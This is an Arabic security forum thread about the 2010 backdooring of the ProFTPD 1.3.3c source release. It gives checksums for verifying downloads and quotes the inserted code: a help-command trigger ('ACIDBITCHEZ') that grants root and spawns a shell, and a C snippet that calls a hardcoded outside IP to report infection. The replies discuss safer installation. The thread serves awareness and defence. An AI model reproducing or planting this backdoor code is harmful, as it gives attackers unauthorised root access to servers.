إعـــــــلان

تقليص
لا يوجد إعلان حتى الآن.

موقع ProFTPD يتعرض للاختراق والتغير

تقليص
X
 
  • تصفية - فلترة
  • الوقت
  • عرض
إلغاء تحديد الكل
مشاركات جديدة

  • موقع ProFTPD يتعرض للاختراق والتغير

    بسم الله الرحمن الرحيم

    تعرض موقع ProFTPD للاختراق في 28 نوفمبر 2010 ليس هدا وحسب بل ان المخترقين الدين صراحة ابدو مهارة خارقة لا في الاختراق ولا في كيفية الاستفادة فبدل كشف اختراقهم قامو بتغير سورس كود اصدار ProFTPD 1.3.3c بسورس كود يحتوي على برنامج خبيث (باك دور) الى ان تم ملاحظة هدا من طرف شخص يدعى Daniel Austin وبعد الابلاغ تم اصلاح المشكل في 1 دجنبر 2010 مما يجعل كل شخص قام بالتحميل من الموقع في الفترة الفاصلة بين التارخين معرضا لخطر الاختراق وشخصيا ارى ان هؤلاء المحترفين قد ارادوا استهداف موقع او شركة ما وربما هدا الهدف صعب المنال فلجئوا الى هده الطريقة فالباكدور الدي تم زرعه يمنح اشخاص غير مصرح لهم اتصال عن بعد بصلاحية root وادا كنت من هؤلاء الاشخاص الغير محظوظين والدين قاموا بالتحميل في هده المدة فيجدر بك التاكد لكي يتم اصلاح المشكل ولكي تقوم بالتاكد من انك مصاب هناك طريقة بسيطة يعرفها معظمكم وهي عن طريق طابع MD5 ولكي تقوم بدلك سوف تحتاج الى Md5 الاصلي الدي هو هدا

    كود PHP:
      8571bd78874b557e98480ed48e2df1d2  proftpd-1.3.3c.tar.bz2
     4f2c554d6273b8145095837913ba9e5d  proftpd
    -1.3.3c.tar.gz 
    وفيما يلي تحليل بسيط للباتش

    كود PHP:
    diff -Naur proftpd-1.3.3c.orig/configure proftpd-1.3.3c/configure
    --- proftpd-1.3.3c.orig/configure   2010-04-14 00:01:35.000000000 +0200
    +++ proftpd-1.3.3c/configure    2010-10-29 19:08:56.000000000 +0200
     
    diff 
    -Naur proftpd-1.3.3c.orig/src/help.c proftpd-1.3.3c/src/help.c
    --- proftpd-1.3.3c.orig/src/help.c  2009-07-01 01:31:18.000000000 +0200
    +++ proftpd-1.3.3c/src/help.c   2010-11-16 18:40:46.000000000 +0100 
    حيث عن طريق تنفيد الامر diff يمكن بشكل واضح رؤية الاختلاف بين الملف الاصلي والملف الدي تم زرعه وهنا يمكن رؤية الملفين الدي تم التعديل عليهما help.c و حتى tests.c

    كود PHP:
    #include "conf.h"
    #include <stdlib.h>
    #include <string.h>
      
     
    struct help_rec {
       const 
    char *cmd;
             
    cmd->server->ServerAdmin cmd->server->ServerAdmin "ftp-admin");
      
         } else {

          if (
    strcmp(target"ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
           
    /* List the syntax for the given target command. */
           
    for (0help_list->neltsi++) {
             if (
    strcasecmp(helps[i].cmdtarget) == 0) { 
    وايضا فيمكن الملاحظة بشكل واضح انه يتم اعطاء صلاحية root للمخترق

    كود PHP:
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <unistd.h>
    #include <netdb.h>
    #include <signal.h>
    #include <string.h>

    #define DEF_PORT 9090
    #define DEF_TIMEOUT 15
    #define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n"

    int sock;

    void handle_timeout(int sig)
    {
        
    close(sock);
        exit(
    0);
    }

    int main(void)
    {

            
    struct sockaddr_in addr;
            
    struct hostent *he;
            
    u_short port;
            
    char ip[20]="212.26.42.47";    /*  EDB NOTE - HARDCODED IP */
            
    port DEF_PORT;
            
    signal(SIGALRMhandle_timeout);
            
    alarm(DEF_TIMEOUT);
            
    he=gethostbyname(ip);
            if(
    he==NULL) return(-1);
            
    addr.sin_addr.s_addr = *(unsigned long*)he->h_addr;
            
    addr.sin_port htons(port);
            
    addr.sin_family AF_INET;
            
    memset(addr.sin_zero08);
            
    sprintf(ipinet_ntoa(addr.sin_addr));
            if((
    sock socket(AF_INETSOCK_STREAM0))==-1)
            {
                    return 
    EXIT_FAILURE;
            }
            if(
    connect(sock, (struct sockaddr*)&addrsizeof(struct sockaddr))==-1)
            {
                
    close(sock);
                return 
    EXIT_FAILURE;
            }
            if(-
    == send(sockDEF_COMMANDstrlen(DEF_COMMAND), 0))
            {
                return 
    EXIT_FAILURE;
            }
            
    close(sock);

    return 
    0

    وهنا لتمكين الاتصال على اي انصح وبشدة بالحدر الشديد كما اود ان اشير الى الاهمية الخارقة التي اثبتتها فكرة السورس الكود المفتوح المصدر حيث ان المهتمين واقصد بدلك الاشخاص الدين يقومون بالاظطلاع على السورس كود قبل التثبيت قادرون على المساعدة فتخيل معي ان البرنامج غير مفتوح المصدر على اي وكخلاصة للموضوع فان هؤلاء المخترقين قد اثبتوا لنا ان لا شيئ امن وانه يجب الحذر ثم الحذر.

    لمعومات اكثر

    http://www.exploit-db.com/exploits/15662/

  • #2
    شكرا على هذا الطرح المميز أخي محمد، ومن زمان عن مواضيعك اشتقنا لها
    وما شاء الله على هذا الفكر الرائع
    أنظر إلى هذه المجموعة من المخترقين كيف ابتكروا طريقة حلوة للدخول إلى هدف ما وعلى ما أظن قاموا بهذه الخطوة بعد فشلهم في الحصول على الهدف مباشرة
    وهكذا يجب أن نفكر فلا يجب أن تحدد تفكيرك في شيء معين أو أداة أو فكرة معينة بل يجب أن تطلق العنان والآفاق لتفكيرك لكي تبدع في أسلوبك في الوصول إلى ذلك الهدف
    شكرا لك مرة أخرى

    تحياتي
    اللهم إنا نعوذ بك من قلب لا يخشع وعلم لا ينفع

    تعليق


    • #3
      الطريقة ليست إبداعا أو ماشابه فقد سبق وتعرضت برامج أخرى لحوادث مشابهة منها أباتشي

      الجميل في الأمر سرعة إكتشاف وإصلاح الثغرة

      تعليق


      • #4
        هذا لمن يقوم بتثبيت البرامج من مواقعها الأصلية

        وتبقى أأمن طريقة ( لحد ما ) هي تثبيت البرامج من المستودعات الرسمية للتوزيعة .

        تعليق


        • #5
          لدى نفس الاصداره على جهازى الشخصى

          [email protected] ~]$ rpm -q proftpd
          proftpd-1.3.3c-1.fc14.x86_64

          علما بأننى قمت بتنصيبه عن طريق المستودعات الخاصه بفيدورا
          والامر التالى

          yum install proftpd
          انا استخدمه لغرض التعلم فقط
          هل جهازى مصاب بهذا التروجان , وكيف لى ان اعرف ؟؟
          اللَّهُمَّ إنى أَعُوذُ بِكَ أَنْ أَضِلَّ أَوْ أُضَلَّ أَوْ أَزِلَّ أَوْ أُزَلَّ أَوْ أَظْلِمَ أَوْ أُظْلَمَ أَوْ أَجْهَلَ أَوْ يُجْهَلَ عَلَيَّ

          تعليق


          • #6
            المشاركة الأصلية بواسطة i-control مشاهدة المشاركة
            لدى نفس الاصداره على جهازى الشخصى

            [email protected] ~]$ rpm -q proftpd
            proftpd-1.3.3c-1.fc14.x86_64

            علما بأننى قمت بتنصيبه عن طريق المستودعات الخاصه بفيدورا
            والامر التالى

            yum install proftpd
            انا استخدمه لغرض التعلم فقط
            هل جهازى مصاب بهذا التروجان , وكيف لى ان اعرف ؟؟
            بالطبع لا فالحديث هنا عن التثبيت من المصدر
            عموما أزل البرنامج وثبته من جديد لن تخسر شى
            ولكن قبل التثبيت إحزف الحزمة من مجلد أرشيف yum إذا كنت قد فعلت خاصية حفظ الحزم

            تعليق

            يعمل...
            X